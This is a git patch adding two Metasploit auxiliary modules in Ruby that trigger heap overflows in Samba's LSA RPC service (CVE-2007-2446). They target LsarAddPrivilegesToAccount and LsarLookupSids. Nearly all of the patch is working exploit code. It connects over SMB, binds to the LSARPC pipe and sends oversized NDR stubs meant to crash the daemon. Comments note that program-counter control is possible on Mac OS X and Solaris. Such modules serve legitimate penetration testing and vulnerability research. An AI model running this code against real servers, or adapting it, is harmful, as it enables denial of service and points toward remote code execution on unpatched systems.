From fc7dcf82dcad9eb0560ba34d1a43bc070268db96 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 21 May 2007 20:54:00 +0000
Subject: [PATCH] Adding the PoC modules for transnames/addprivs

git-svn-id: file:///home/svn/framework3/trunk@4954 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../auxiliary/dos/samba/lsa_addprivs_heap.rb  | 91 ++++++++++++++++++
 .../dos/samba/lsa_transnames_heap.rb          | 93 +++++++++++++++++++
 2 files changed, 184 insertions(+)
 create mode 100644 modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
 create mode 100644 modules/auxiliary/dos/samba/lsa_transnames_heap.rb

diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
new file mode 100644
index 0000000000..45724463df
--- /dev/null
+++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
@@ -0,0 +1,91 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Auxiliary::Dos::Samba::LSA_AddPrivs_Heap < Msf::Auxiliary
+
+	include Auxiliary::Dos
+	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+	
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Samba lsa_io_privilege_set Heap Overflow',
+			'Description'    => %q{
+				This module triggers a heap overflow in the LSA RPC service
+			of the Samba daemon.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['CVE', '2007-2446'],
+				]
+			))
+			
+		register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),
+			], self.class)
+						
+	end
+
+	def run
+	
+		pipe = datastore['SMBPIPE'].downcase
+				
+		print_status("Connecting to the SMB service...")
+		connect()
+		smb_login()
+
+		datastore['DCERPC::fake_bind_multi'] = false
+
+		handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+		#    Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
+		# Mac OS X: PC control via memcpy to stack ptr
+		#  Solaris: PC control via memcpy to stack ptr
+		
+		stub = lsa_open_policy(dcerpc)
+		stub << NDR.long(1)
+		stub << NDR.long(0xffffffff)
+		stub << NDR.long(0x100)
+		stub << "X" * 0x100
+		
+		print_status("Calling the vulnerable function...")
+
+		begin
+			# LsarAddPrivilegesToAccount
+			dcerpc.call(0x13, stub)
+		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			print_good('Server did not respond, this is expected')
+		rescue => e
+			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
+				print_good('Server disconnected, this is expected')
+			else
+				raise e
+			end
+		end
+		
+		disconnect	
+	end
+
+end
+end	
diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb
new file mode 100644
index 0000000000..246078880f
--- /dev/null
+++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb
@@ -0,0 +1,93 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Auxiliary::Dos::Samba::LSA_TransNames_Heap < Msf::Auxiliary
+
+	include Auxiliary::Dos
+	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+	
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Samba lsa_io_trans_names Heap Overflow',
+			'Description'    => %q{
+				This module triggers a heap overflow in the LSA RPC service
+			of the Samba daemon.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['CVE', '2007-2446'],
+				]
+			))
+			
+		register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),
+			], self.class)
+						
+	end
+
+	def run
+	
+		pipe = datastore['SMBPIPE'].downcase
+				
+		print_status("Connecting to the SMB service...")
+		connect()
+		smb_login()
+
+		datastore['DCERPC::fake_bind_multi'] = false
+
+		handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+		stub = lsa_open_policy(dcerpc)
+		stub << NDR.long(0)
+		stub << NDR.long(0)
+		stub << NDR.long(1)
+		stub << NDR.long(0x20004)
+		stub << NDR.long(0x100)
+		stub << ("X" * 16) * 0x100
+		stub << NDR.long(1)
+		stub << NDR.long(0)
+
+		print_status("Calling the vulnerable function...")
+
+		begin
+			# LsarLookupSids
+			dcerpc.call(0x0f, stub)
+		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			print_good('Server did not respond, this is expected')
+		rescue => e
+			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
+				print_good('Server disconnected, this is expected')
+			else
+				raise e
+			end
+		end
+		
+		dcerpc.call(0x0f, stub)
+		
+		disconnect	
+	end
+
+end
+end